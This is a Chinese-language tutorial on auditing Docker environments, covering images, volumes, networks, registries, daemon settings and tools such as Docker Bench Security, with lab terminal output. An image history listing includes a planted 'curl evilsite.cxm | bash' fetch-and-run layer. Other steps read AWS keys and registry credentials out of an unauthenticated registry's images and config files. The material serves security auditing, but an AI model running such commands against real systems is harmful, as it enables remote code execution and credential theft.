审计Docker容器

从安全的角度对Docker容器化环境进行审核，涉及识别部署和运行时的错误配置。审核docker容器及其运行时环境需要检查以下的组件：

Docker images

Docker containers

Docker networks

Docker registeries

Docker volumes

Docker runtime

在本节中，我们将探讨允许安全审计人员在Docker容器化环境中进行有效地执行安全审计的工具和技术。

前情提要攻击和审计Docker容器02 、攻击和审计Docker容器01

一、审计Docker 镜像和容器

我们可以执行多项检查来对镜像和容器进行审计。容器只不过正在运行的镜像实例。我们可以查看镜像的配置和选项，以查找问题和错误配置。

1.1 检查校验和

命令：docker images --digests <image_name>

student@debian:~$ docker images --digests ubuntu

REPOSITORY          TAG                 DIGEST                                                                    IMAGE ID            CREATED             SIZE

ubuntu              latest              sha256:3f119dc0737f57f704ebecac8a6d8477b0f6ca1ca0332c7ee1395ed2c6a82be7   735f80812f90        15 months ago       83.5MB

ubuntu              <none>              sha256:e7326dd576fefaa0a478a1826df1d122d565948fd792a6dafa0313496d2dd6f0   71aa5f3f90dc        3 years ago         118MB

student@debian:~$

1.2 通过内容信任机制获取签名

默认情况下，内容信任机制是关闭的，需要设置DOCKER_CONTENT_TRUST环境变量为1

开启它。

使用 docker trust 命令语法检查镜像颁发者

student@debian:~$ docker trust inspect mediawiki --pretty

Signatures for mediawiki

SIGNED TAG          DIGEST                                                             SIGNERS

1.27                2c46c500b7191763b30b0a51cbed87d143eac53cec979ce4225e96d1f33e6b51   (Repo Admin)

1.27.3              0759087555cbbad8531167c2fa7575b94bae1e226321449480ecb3ea71ba5adf   (Repo Admin)

1.27.4              dc793a0cfcf54ec59f126a90e7b37c4e5edfd0559d6a83eccb38b9f25b246041   (Repo Admin)

1.27.5              4d27850cae1b3c6ed490ff470f16bd006801dcced3f0e51abe0d188c623a037b   (Repo Admin)

1.27.6              ec941821da2c6e1e33ffcbfde44dd1cfdcdc7d966dc7cbee52560c6b493e9e0e   (Repo Admin)

1.27.7              2c46c500b7191763b30b0a51cbed87d143eac53cec979ce4225e96d1f33e6b51   (Repo Admin)

1.3 查找已知漏洞

dockerhub中的镜像大部分都是使用的基础镜像，如果这些镜像没有及时更新的话，则可能存在已知的漏洞。

我们可以使用 docker hub 仓库扫描，clair（容器静态安全漏洞分析工具）来检查镜像中是否存在漏洞。

使用vulners audit检测老旧的docker镜像是否有漏洞

Vulners audit工具能帮你轻松的检测操作系统中是否存在易受攻击的软件包。选择操作系统类型，版本，然后提交已安装软件包的列表，以查找哪些软件容易受到攻击 。

student@debian:~$ docker run --rm -it 71aa5f3f90dc bash

root@b1381dd36f2d:/# cat /etc/issue

Ubuntu Xenial Xerus (development branch) \n \l

root@b1381dd36f2d:/# dpkg-query -W -f='${Package} ${Version} ${Architecture}\n'

adduser 3.113+nmu3ubuntu4 all

apt 1.1.10 amd64

base-files 9.4ubuntu3 amd64

base-passwd 3.5.39 amd64

bash 4.3-14ubuntu1 amd64

bsdutils 1:2.27.1-1ubuntu3 amd64

coreutils 8.23-4ubuntu2 amd64

dash 0.5.7-4ubuntu2 amd64

debconf 1.5.58ubuntu1 all

把获取的软件列表，粘贴到vulners中进行漏洞检测

然后你可以点HOW TO Fix 查看修复指导。

1.4 检查元数据、安全和环境变量配置

可以执行docker inspect来检查这些数据

docker inspect <image_name>

docker inspect <container_name>

1.5 检查镜像构建历史

使用 docker history来检查

student@debian:~$ docker history custom-htop

IMAGE        CREATED    CREATED BY                      SIZE           COMMENT

5aed0e1b7a7b        15 months ago       /bin/sh -c #(nop)  CMD ["htop"]                 0B           

87b65d2afa9c        15 months ago       /bin/sh -c echo "curl evilsite.cxm | bash"      0B           

70bc108c1ca4        15 months ago       /bin/sh -c apk --no-cache add htop              2.79MB       

7c515b0b913d        15 months ago       /bin/sh -c #(nop)  LABEL MAINTAINER=Madhu Ak…   0B           

11cd0b38bc3c        16 months ago       /bin/sh -c #(nop)  CMD ["/bin/sh"]              0B           

<missing>           16 months ago       /bin/sh -c #(nop) ADD file:25f61d70254b9807a…   4.41MB       

student@debian:~$ 

二、审计Docker数据卷和网络

2.1 列出并检查docker数据卷

1、列出数据卷

student@debian:~$ docker volume ls

DRIVER              VOLUME NAME

local               1e030154f4952361cec6c21e838a0fb617c7b7cc6359570407eb9f697b229b67

local               9159b373c0d298cb2fdc2bfe1c2f650e8a115d8c54fa4c94106b8f9405c20526

local               d9af2c81173f9a49ffa343d8f195bc03578cff8b5690c498acbb9bedfc0168eb

local               wordpress_db_data

student@debian:~$ 

2、检验数据卷

student@debian:~$ docker volume inspect 1e030154f4952361cec6c21e838a0fb617c7b7cc6359570407eb9f697b229b67

[

    {

        "CreatedAt": "2018-07-31T23:16:18+05:30",

        "Driver": "local",

        "Labels": null,

        "Mountpoint": "/var/lib/docker/volumes/1e030154f4952361cec6c21e838a0fb617c7b7cc6359570407eb9f697b229b67/_data",

        "Name": "1e030154f4952361cec6c21e838a0fb617c7b7cc6359570407eb9f697b229b67",

        "Options": null,

        "Scope": "local"

    }

]

student@debian:~$ 

3、查找敏感信息

student@debian:~$ sudo -i 

root@debian:~# cd /var/lib/docker/volumes/1e030154f4952361cec6c21e838a0fb617c7b7cc6359570407eb9f697b229b67/_data/

root@debian:/var/lib/docker/volumes/1e030154f4952361cec6c21e838a0fb617c7b7cc6359570407eb9f697b229b67/_data# ls

index.php    wp-activate.php     wp-comments-post.php  wp-content   wp-links-opml.php  wp-mail.php      wp-trackback.php

license.txt  wp-admin            wp-config.php         wp-cron.php  wp-load.php        wp-settings.php  xmlrpc.php

readme.html  wp-blog-header.php  wp-config-sample.php  wp-includes  wp-login.php       wp-signup.php

root@debian:/var/lib/docker/volumes/1e030154f4952361cec6c21e838a0fb617c7b7cc6359570407eb9f697b229b67/_data# grep -i 'flag' wp-config.php 

#### FLAG = ae984bd8ecc6ec916f808586

root@debian:/var/lib/docker/volumes/1e030154f4952361cec6c21e838a0fb617c7b7cc6359570407eb9f697b229b67/_data# grep -i 'password' wp-config.php 

/** MySQL database password */

define('DB_PASSWORD', 'ComplicatedPassword');

root@debian:/var/lib/docker/volumes/1e030154f4952361cec6c21e838a0fb617c7b7cc6359570407eb9f697b229b67/_data# 

数据卷可以使用只读，读写模式

3.1 列出并检查docker网络

默认情况下，我们使用docker集群或docker compose时，docker会创建它自己的网络命名空间。

默认情况下，有 bridge，host，null 三种网络模式可用

1、 列出网络

student@debian:~$ docker network ls

NETWORK ID          NAME                DRIVER              SCOPE

ad816ae1f31a        bridge              bridge              local

208a8324cfc4        docker_gwbridge     bridge              local

f2e1e0c88ec1        host                host                local

2035d107fc5a        none                null                local

068b477b3311        wordpress_default   bridge              local

student@debian:~$ 

2、检验网络

student@debian:~$ docker inspect wordpress_default

[

    {

        "Name": "wordpress_default",

        "Id": "068b477b3311309905427ceb723f9bc7b23137163fa0c75b9ef02bc2e40eddb4",

        "Created": "2018-08-01T16:32:13.813271613+05:30",

        "Scope": "local",

        "Driver": "bridge",

        "EnableIPv6": false,

        "IPAM": {

            "Driver": "default",

            "Options": null,

            "Config": [

                {

                    "Subnet": "172.20.0.0/16",

                    "Gateway": "172.20.0.1"

                }

            ]

我们可用nmap或nc来执行扫描和信息收集

三、审计Docker仓库

Docker仓库用于Docker镜像的存储，分发。里面有许多不同的镜像，每个镜像可能有多个标签和版本。默认情况下，docker仓库的开放端口是5000

，并且没有认证和加密。我们将使用一个未授权的docker私有仓库来执行安全审计。

3.1 检查仓库状态

student@debian:~$ curl -s http://localhost:5000/v2/_catalog | jq .

{

  "repositories": [

    "devcode",

    "hello-world"

  ]

}

student@debian:~$ 

3.2 获取镜像信息

student@debian:~$ curl -s http://localhost:5000/v2/devcode/tags/list | jq .

{

  "name": "devcode",

  "tags": [

    "latest"

  ]

}

student@debian:~$ 

3.3 下载镜像

student@debian:~$ docker pull localhost:5000/devcode:latest

latest: Pulling from devcode

8e3ba11ec2a2: Already exists 

8860a1621cb6: Pull complete 

Digest: sha256:5b9705ef4f3e7070c077c7999269e80dfc850bed4e3608c80399e9547ee72039

Status: Downloaded newer image for localhost:5000/devcode:latest

student@debian:~$ 

3.4 检查容器里面的敏感数据

student@debian:~$ docker run --rm -it localhost:5000/devcode:latest sh

/ # cat /.aws/credentials

[default]

aws_access_key_id = AKIAAAAAAAAAAAAAAAAA

aws_secret_access_key = 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

/ # 

3.5 检查docker daemon 默认配置

查看docker运行时默认用户名和仓库

student@debian:~$ clear

student@debian:~$ docker system info

Name: debian

Registry: https://index.docker.io/v1/

Labels:

Experimental: false

Insecure Registries:

 127.0.0.0/8

student@debian:~$ 

3.6 查看仓库配置表

获取凭证信息

cat  ~/.docker/config.json

四、审计Docker运行环境和终端

4.1 检查docker daemon配置

student@debian:~$ docker info

Containers: 6

 Running: 6

 Paused: 0

 Stopped: 0

Images: 17

Server Version: 18.06.0-ce

Storage Driver: overlay2

 Backing Filesystem: extfs

 Supports d_type: true

 Native Overlay Diff: true

Logging Driver: json-file

Cgroup Driver: cgroupfs

Plugins:

 Volume: local

 Network: bridge host macvlan null overlay

 Log: awslogs fluentd gcplogs gelf journald json-file logentries splunk syslog

Swarm: inactive

Runtimes: runc

Default Runtime: runc

Init Binary: docker-init

containerd version: d64c661f1d51c48782c9cec8fda7604785f93587

runc version: 69663f0bd4b60df09991c08812a60108003fa340

init version: fec3683

Security Options:

 apparmor

 seccomp

  Profile: default

Kernel Version: 4.4.0-116-generic

Operating System: Ubuntu 16.04.5 LTS

OSType: linux

Architecture: x86_64

CPUs: 1

Total Memory: 992.2MiB

Name: debian

ID: IES2:63C3:4DEK:G6HC:KHB4:R2DX:4VAQ:HEWN:OVK7:UZ56:IJZH:TRRE

Docker Root Dir: /var/lib/docker

Debug Mode (client): false

Debug Mode (server): false

Registry: https://index.docker.io/v1/

Labels:

Experimental: false

Insecure Registries:

 127.0.0.0/8

Live Restore Enabled: false

WARNING: No swap limit support

student@debian:~$ 

主要审计这些内容：

4.2 查看事件

查看docker 运行时产生的全局事件(实时日志)

student@debian:~$ docker system events

2019-11-18T13:52:59.537588194+05:30 container kill 3e461d4c687914e06c790f0160420da068384b41b4fc57b3b54ecaf7becf3d12 (image=nginx:alpine, maintainer=NGINX Docker Maintainers <docker-maint@nginx.com>, name=samplewebapp2, signal=15)

2019-11-18T13:53:00.230169002+05:30 container die 3e461d4c687914e06c790f0160420da068384b41b4fc57b3b54ecaf7becf3d12 (exitCode=0, image=nginx:alpine, maintainer=NGINX Docker Maintainers <docker-maint@nginx.com>, name=samplewebapp2)

2019-11-18T13:53:00.278895211+05:30 network disconnect ad816ae1f31af2f3348edb3241952207844cbcda1fad7d5d4e94606b4d1ffca3 (container=3e461d4c687914e06c790f0160420da068384b41b4fc57b3b54ecaf7becf3d12, name=bridge, type=bridge)

2019-11-18T13:53:00.355323063+05:30 container stop 3e461d4c687914e06c790f0160420da068384b41b4fc57b3b54ecaf7becf3d12 (image=nginx:alpine, maintainer=NGINX Docker Maintainers <docker-maint@nginx.com>, name=samplewebapp2)

2019-11-18T13:53:00.391660783+05:30 container destroy 3e461d4c687914e06c790f0160420da068384b41b4fc57b3b54ecaf7becf3d12 (image=nginx:alpine, maintainer=NGINX Docker Maintainers <docker-maint@nginx.com>, name=samplewebapp2)

4.3 检查暴露的API端口

检查API端口是否暴露在0.0.0.0

ctf@debian:~$ sudo cat /lib/systemd/system/docker.service 

[Unit]

Description=Docker Application Container Engine

Documentation=https://docs.docker.com

After=network-online.target docker.socket firewalld.service

Wants=network-online.target

Requires=docker.socket

[Service]

Type=notify

# the default is not to use systemd for cgroups because the delegate issues still

# exists and systemd currently does not support the cgroup feature set required

# for containers run by docker

#ExecStart=/usr/bin/dockerd -H fd://

ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375

ExecReload=/bin/kill -s HUP $MAINPID

4.4 检查docker socket安全

检查docker socket是否被挂载到容器中

student@debian:~$ docker inspect portainer | grep  -i '/var/run/'

                "/var/run/docker.sock:/var/run/docker.sock",

                "Source": "/var/run/docker.sock",

                "Destination": "/var/run/docker.sock",

            "SandboxKey": "/var/run/docker/netns/69e44b98856e",

student@debian:~$ 

4.5 检查其他文件和数据

student@debian:~$ sudo ls -l /var/lib/docker/

total 64

drwx------  2 root root  4096 Jul 31  2018 builder

drwx------  4 root root  4096 Jul 31  2018 buildkit

drwx------  3 root root  4096 Jul 31  2018 containerd

drwx------  7 root root  4096 Nov 18 13:53 containers

drwx------  3 root root  4096 Jul 31  2018 image

drwxr-x---  3 root root  4096 Jul 31  2018 network

drwx------ 72 root root 16384 Nov 18 13:53 overlay2

drwx------  4 root root  4096 Jul 31  2018 plugins

drwx------  2 root root  4096 Nov 14 22:09 runtimes

drwx------  2 root root  4096 Aug  1  2018 swarm

drwx------  2 root root  4096 Nov 15 15:04 tmp

drwx------  2 root root  4096 Jul 31  2018 trust

drwx------  6 root root  4096 Nov 15 08:37 volumes

student@debian:~$ 

五、Docker完整性检查

我们可用对容器内文件系统中文件和目录修改进行审计。

使用diff选项对以下三种行为事件进行审计：

A-Add

D-Delete

C-Change

5.1 示例

运行一个容器，并执行一些更改

student@debian:~$ docker run --name checkintegriy -it ubuntu:latest bash

root@662582e16f84:/# mkdir -p /data/output

root@662582e16f84:/# echo "modifed this stuff" > /.dockerenv

root@662582e16f84:/# exit

exit

student@debian:~$ 

使用diff选项查看更改

student@debian:~$ docker diff checkintegriy

C /root

A /root/.bash_history

C /.dockerenv

A /data

A /data/output

student@debian:~$ 

六、使用Docker Bench Security 进行审计

Docker Bench Security是一个Docker官方出品的用来对Docker容器生产环境执行安全检查的Shell脚本。这些测试都是自动化的，其灵感来自CIS Docker基准。

更多详情请查看： GitHub - docker/docker-bench-security: The Docker Bench for Security is a script that checks for dozens of common best-practices around deploying Docker containers in production. 

https://github.com/docker/docker-bench-security

脚本会执行的6项主要检查：

1、主机配置

2、Docker daemon配置文件

3、Docker容器镜像

4、Docker运行环境

5、Docker安全运维

6、Docker集群配置

6.1 运行Docker bench security

执行脚本进行审核

student@debian:/opt/docker-bench-security$ sudo bash docker-bench-security.sh

# ------------------------------------------------------------------------------

# Docker Bench for Security v1.3.4

#

# Docker, Inc. (c) 2015-

#

# Checks for dozens of common best-practices around deploying Docker containers in production.

# Inspired by the CIS Docker Community Edition Benchmark v1.1.0.

# ------------------------------------------------------------------------------

Initializing Mon Nov 18 14:26:16 IST 2019

[INFO] 1 - Host Configuration

[WARN] 1.1  - Ensure a separate partition for containers has been created

[NOTE] 1.2  - Ensure the container host has been Hardened

[INFO] 1.3  - Ensure Docker is up to date

[INFO]      * Using 18.06.0, verify is it up to date as deemed necessary

[INFO]      * Your operating system vendor may provide support and security maintenance for Docker

[INFO] 1.4  - Ensure only trusted users are allowed to control Docker daemon

[INFO]      * docker:x:999:student

[WARN] 1.5  - Ensure auditing is configured for the Docker daemon

七、使用amicontained进行安全审计

Container自检(Introspection)工具，能找出正在使用的容器运行环境以及可用的功能。

7.1 运行无特权容器

student@debian:~$ docker run --rm -it r.j3ss.co/amicontained -d

Container Runtime: docker

Has Namespaces:

  pid: true

  user: false

AppArmor Profile: docker-default (enforce)

Capabilities:

  BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap

Chroot (not pivot_root): false

Seccomp: filtering

student@debian:~$ 

7.2 以主机特权运行容器

student@debian:~$ docker run --rm -it --pid host r.j3ss.co/amicontained -d

Container Runtime: docker

Has Namespaces:

  pid: false

  user: false

AppArmor Profile: docker-default (enforce)

Capabilities:

  BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap

Chroot (not pivot_root): false

Seccomp: filtering

student@debian:~$ 

7.3 添加安全选项运行

student@debian:~$ docker run --rm -it --security-opt "apparmor=unconfined" r.j3ss.co/amicontained -d

Container Runtime: docker

Has Namespaces:

  pid: true

  user: false

AppArmor Profile: unconfined

Capabilities:

  BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap

Chroot (not pivot_root): false

Seccomp: filtering

student@debian:~$